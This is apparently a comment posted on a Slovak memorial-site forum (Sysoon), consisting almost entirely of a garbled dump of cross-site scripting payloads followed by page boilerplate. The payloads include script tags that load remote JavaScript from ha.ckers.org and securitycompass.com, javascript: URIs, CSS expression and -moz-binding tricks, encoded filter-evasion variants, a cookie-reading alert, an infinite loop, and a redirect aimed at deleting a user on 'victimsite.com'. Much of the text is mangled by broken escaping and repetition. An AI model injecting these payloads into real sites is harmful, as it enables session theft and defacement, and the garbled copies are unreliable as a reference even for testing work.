&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(&quot;XSS&quot;)&gt;

<SCRIPT SRC=ha.ckers.org/xss.js

<SCRIPT SRC=//ha.ckers.org/.j>

&lt;IMG SRC=&quot;javascript:alert(&apos;XSS&apos;)&quot;

<IFRAME SRC=ha.ckers.org/scriptlet.html <

&lt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;);//&lt;&lt;/SCRIPT&gt;

&lt;IMG &quot;&quot;&quot;&gt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;&quot;&gt;

&lt;SCRIPT&gt;a=/XSS/

<SCRIPT a=">" SRC="ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT ="blah" SRC="ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a="blah" '' SRC="ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT "a='>'" SRC="ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=`>` SRC="ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=">'>" SRC="ha.ckers.org/xss.js"></SCRIPT>

&lt;A HREF=&quot;http://66.102.7.147/&quot;&gt;XSS&lt;/A&gt;

&lt;A HREF=&quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&quot;&gt;XSS&lt;/A&gt;

&lt;A HREF=&quot;http://1113982867/&quot;&gt;XSS&lt;/A&gt;

&lt;A HREF=&quot;http://0x42.0x0000066.0x7.0x93/&quot;&gt;XSS&lt;/A&gt;

&lt;A HREF=&quot;http://0102.0146.0007.00000223/&quot;&gt;XSS&lt;/A&gt;

&lt;A HREF=&quot;h&#x0A;tt&#09;p://6&amp;#09;6.000146.0x7.147/&quot;&gt;XSS&lt;/A&gt;

<A HREF="//www.google.com/">XSS</A>

&lt;A HREF=&quot;//google&quot;&gt;XSS&lt;/A&gt;

<A HREF="ha.ckers.org@google">XSS</A>

<A HREF="http://google:ha.ckers.org">XSS</A>

<A HREF="google.com/">XSS</A>

<A HREF="www.google.com./">XSS</A>

<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>

<A HREF="www.gohttp://www.google.com/ogle.com/">XSS</A>

document.vulnerable=true;

document.vulnerable=true;//

document.vulnerable=true;

<img SRC="javascript:<a href="http://document.vulnerable=true;" target="_blank" rel="nofollow">document.vulnerable=true;</a>"

<iframe src="javascript:<a href="http://document.vulnerable=true;" target="_blank" rel="nofollow">document.vulnerable=true;</a> <

a=/XSS/\ndocument.vulnerable=true;

\";document.vulnerable=true;;//

document.vulnerable=true;

li {list-style-image: url("javascript:document.vulnerable=true;");XSS

1script3document.vulnerable=true;1/script3

@im\port'\ja\vasc\ript:document.vulnerable=true';

exp/*

document.vulnerable=true;

.XSS{background-image:url("javascript:document.vulnerable=true");}

BODY{background:url("javascript:document.vulnerable=true")}

document.vulnerable=true;

]]

cript:document.vulnerable=true">

document.vulnerable=true">

document.vulnerable=true'); ?>

document.vulnerable=true">

+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4-

&document.vulnerable=true;

&{document.vulnerable=true;};

document.vulnerable=true;">

document.vulnerable=true;

document.vulnerable=true;//-->

document.vulnerable=true;

document.vulnerable=true;//-->

document.vulnerable=true;

" onmouseover="document.vulnerable=true;">

document.vulnerable=true;;

[\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script>

@import'www.securitycompass.com/xss.css';

; REL=stylesheet">

BODY{-moz-binding:url("www.securitycompass.com/xssmoz.xml#xss")}

XSS

'"-->

" SRC="www.securitycompass.com/xss.js">

" SRC="www.securitycompass.com/xss.js">

" '' SRC="www.securitycompass.com/xss.js">

'" SRC="www.securitycompass.com/xss.js">

` SRC="www.securitycompass.com/xss.js">

'>" SRC="www.securitycompass.com/xss.js">

document.write("PT SRC="www.securitycompass.com/xss.js">

[Mozilla]

&quot;&gt;&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(&quot;XSS&quot;)&gt;

&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;

&lt;/br style=a:expression(alert())&gt;

&lt;scrscriptipt&gt;alert(1)&lt;/scrscriptipt&gt;

&lt;br size=\&quot;&amp;{alert(&#039;XSS&#039;)}\&quot;&gt;

perl -e &#039;print \&quot;&lt;IMG SRC=java\0script:alert(\&quot;XSS\&quot;)&gt;\&quot;;&#039; &gt; out

perl -e &#039;print \&quot;&lt;SCR\0IPT&gt;alert(\&quot;XSS\&quot;)&lt;/SCR\0IPT&gt;\&quot;;&#039; &gt; out

">alert('XSS')

XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>

XSS STYLE=xss:e/**/xpression(alert('XSS'))>

';;alert(String.fromCharCode(88,83,83))//\';;alert(String.fromCharCode(88,83,83))//";;alert(String.fromCharCode(88,83,83))//\";;alert(String.fromCharCode(88,83,83))//-->;;";>;';>;;alert(String.fromCharCode(88,83,83));

';';;!--";;=&;{()}

;alert(';XSS';);

;;

;alert(String.fromCharCode(88,83,83));

;;;

;;

Redirect 302 /a.jpg victimsite.com/admin.asp&;deleteuser

exp/*<;XSS STYLE=';no\xss:noxss(";*//*";);

;li {list-style-image: url(";javascript:alert(&#39;XSS&#39;)";);};;;XSS

;;

%BCscript%BEalert(%A2XSS%A2)%BC/script%BE

;;

;;;

;;

a=";get";;&;#10;b=";URL(";";;&;#10;c=";javascript:";;&;#10;d=";alert(';XSS';);";)";;&#10;eval(a+b+c+d);

;alert(';XSS';);;

;.XSS{background-image:url(";javascript:alert(';XSS';)";);};;;

;BODY{background:url(";javascript:alert(';XSS';)";)};

;@import';ha.ckers.org/xss.css';;;

;; REL=stylesheet";>;

;BODY{-moz-binding:url(";ha.ckers.org/xssmoz.xml#xss";)};

;;

;;;;

;;;;;]]>;

;;;;cript:alert(';XSS';)";>;;;;

;;

;;

;alert(';XSS';);";>;

;;

;;;';";-->;

<;? echo(';<;SCR)';;

;; ;+ADw-SCRIPT+AD4-alert(';XSS';);+ADw-/SCRIPT+AD4-

\";;alert(';XSS';);//

;;alert("XSS");;

;@im\port';\ja\vasc\ript:alert(";XSS";)';;;

;&#x0D;

perl -e ';print ";";;';>; out

perl -e ';print ";&;;alert(";XSS";);";;'; >; out

;;

<;SCRIPT SRC=<a href="http://ha.ckers.org/xss.js" target="_blank" rel="nofollow">ha.ckers.org/xss.js</a>

<;IMG SRC=";javascript:alert(';XSS';)";

<;IFRAME SRC=<a href="http://ha.ckers.org/scriptlet.html" target="_blank" rel="nofollow">ha.ckers.org/scriptlet.html</a> <;

;alert(";XSS";);//;

;;alert(";XSS";);";>;

;a=/XSS/

;"; SRC=";ha.ckers.org/xss.js";>;;

;;

;;

;';"; SRC=";ha.ckers.org/xss.js";>;;

;` SRC=";ha.ckers.org/xss.js";>;;

;document.write(";;PT SRC=";ha.ckers.org/xss.js";>;;

';>"; SRC=";ha.ckers.org/xss.js";>;;

;XSS;

;XSS;

;XSS;

;XSS;

;XSS;

;XSS;

;XSS;

;XSS;

;XSS;

;XSS;

;XSS;

;XSS;

;XSS;

;XSS;

document.vulnerable=true;

document.vulnerable=true;//

document.vulnerable=true;

<img SRC="javascript:<a href="http://document.vulnerable=true;" target="_blank" rel="nofollow">document.vulnerable=true;</a>"

<iframe src="javascript:<a href="http://document.vulnerable=true;" target="_blank" rel="nofollow">document.vulnerable=true;</a> <

a=/XSS/\ndocument.vulnerable=true;

\";document.vulnerable=true;;//

document.vulnerable=true;

li {list-style-image: url("javascript:document.vulnerable=true;");XSS

1script3document.vulnerable=true;1/script3

@im\port'\ja\vasc\ript:document.vulnerable=true';

exp/*

document.vulnerable=true;

.XSS{background-image:url("javascript:document.vulnerable=true");}

BODY{background:url("javascript:document.vulnerable=true")}

document.vulnerable=true;

]]

cript:document.vulnerable=true">

document.vulnerable=true">

document.vulnerable=true'); ?>

document.vulnerable=true">

+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4-

&document.vulnerable=true;

&{document.vulnerable=true;};

document.vulnerable=true;">

document.vulnerable=true;

document.vulnerable=true;//-->

document.vulnerable=true;

document.vulnerable=true;//-->

document.vulnerable=true;

" onmouseover="document.vulnerable=true;">

document.vulnerable=true;;

[\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script>

@import'www.securitycompass.com/xss.css';

; REL=stylesheet">

BODY{-moz-binding:url("www.securitycompass.com/xssmoz.xml#xss")}

XSS

'"-->

" SRC="www.securitycompass.com/xss.js">

" SRC="www.securitycompass.com/xss.js">

" '' SRC="www.securitycompass.com/xss.js">

'" SRC="www.securitycompass.com/xss.js">

` SRC="www.securitycompass.com/xss.js">

'>" SRC="www.securitycompass.com/xss.js">

document.write("PT SRC="www.securitycompass.com/xss.js">

[Mozilla]

";>;;

;;alert(1);

;alert(1);

perl -e &#039;print \";;\";;&#039; >; out

perl -e &#039;print \";;alert(\";XSS\";);\";;&#039; >; out

">alert('XSS')

XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>

XSS STYLE=xss:e/**/xpression(alert('XSS'))>

>">alert("XSS")&

">@import"javascript:alert('XSS')";

>"'>

>%22%27>

'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'

'';!--"=&{()}

&quot;)>

#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41>

#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

'XSS');">

'XSS');">

var n=0;while(true){n++;}]]>

SCRIPT]]>alert('gotcha');/SCRIPT]]>

]>&xee;

]>&xee;

]>&xee;

]>&xee;

alert('XSS')

%3cscript%3ealert('XSS')%3c/script%3e

%22%3e%3cscript%3ealert('XSS')%3c/script%3e

alert("XSS")">

<IMG SRC="javascript:alert('XSS')"

<iframe src=<a href="http://ha.ckers.org/scriptlet.html" target="_blank" rel="nofollow">ha.ckers.org/scriptlet.html</a> <

alert("XSS");//

%253cscript%253ealert(1)%253c/script%253e

">alert(document.cookie)

fooalert(1)

ipt>alert(1)ipt>

Commented link: /beta2

Date:

Fórum id: 748829

Sysoon Fórum No: 748829, Author: Picapica Pica.

Napíš komentár Pravidlá pre komentáre

└─ aby si pridal komentár.

Názory a komentáre

Show Facebook comments
sk

Výnimočné hroby

Každý pamätník oslavuje život. Mnoho ľudí sa rozhodlo zobrazit ich zosnulých v programe výnimočných hrobov spoločnosti Sysoon.